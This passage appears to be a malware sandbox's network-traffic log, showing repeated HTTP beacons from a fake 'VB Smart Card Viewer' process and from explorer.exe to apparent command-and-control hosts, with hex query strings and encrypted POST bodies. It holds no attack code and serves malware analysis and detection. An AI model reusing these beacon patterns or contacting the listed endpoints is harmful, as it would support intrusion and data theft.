                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:05.575567961 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:05.812444925 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                60192.168.2.649802185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:06.190956116 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:06.432602882 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                61192.168.2.649803185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:06.779546976 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:07.016380072 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                62192.168.2.649804185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:07.354234934 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:07.601557016 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:07.721625090 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:07.958781004 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                63192.168.2.64980591.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:08.042891979 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://hcpsryfdfswb.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 279
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:08.042928934 CET279OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 8b ff 1c ab
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bOac,n:{62O>1cQDI{mk|3wx!< W%fLnAu/mzu0:IAqS?|drkR_s
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:08.294682026 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                64192.168.2.649806185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:08.300482988 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:08.545871019 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:08 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                65192.168.2.649807185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:08.895256042 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:09.137732983 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                66192.168.2.649808185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:09.488209963 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:09.724878073 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:09.845014095 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:10.082019091 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                67192.168.2.64980991.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:09.708600044 CET287OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://jojqjqewwnyplbq.net/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 196
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:09.708636045 CET196OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 9b c8 0e d7
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bOi'zP&S.>_ayx~+sl~=ynVXJ[^^:(EFct2[ag
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:09.966373920 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:09 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                68192.168.2.649810185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:10.501539946 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:10.754626036 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                69192.168.2.649811185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:11.151633978 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:11.394143105 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                70192.168.2.649812185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:11.788120031 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:12.025204897 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:12.158334970 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:12.406018019 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                71192.168.2.649813185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:12.741733074 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:12.980798006 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                72192.168.2.649814185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:13.327491999 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:13.573385000 CET220INHTTP/1.1 200 OK
